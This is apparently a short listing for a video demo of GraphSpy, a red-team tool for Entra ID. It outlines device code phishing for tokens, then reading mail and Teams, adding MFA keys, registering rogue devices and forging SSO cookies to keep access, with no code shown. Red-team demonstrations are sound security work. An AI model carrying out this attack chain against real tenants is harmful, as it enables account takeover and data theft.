A deep dive demo of GraphSpy, an open-source red team tool for enumerating and exploiting Microsoft Azure/Entra ID environments using access tokens. The creator walks through device code phishing to obtain access and refresh tokens, then demonstrates browsing OneDrive, reading Outlook emails, accessing Teams messages via the Skype API, enumerating users and groups, adding MFA methods (including FIDO2 security keys), registering rogue devices, obtaining Primary Refresh Tokens (PRTs), and generating SSO cookies for persistent access — all without knowing the victim's username or password.
•41m watch time
Sort: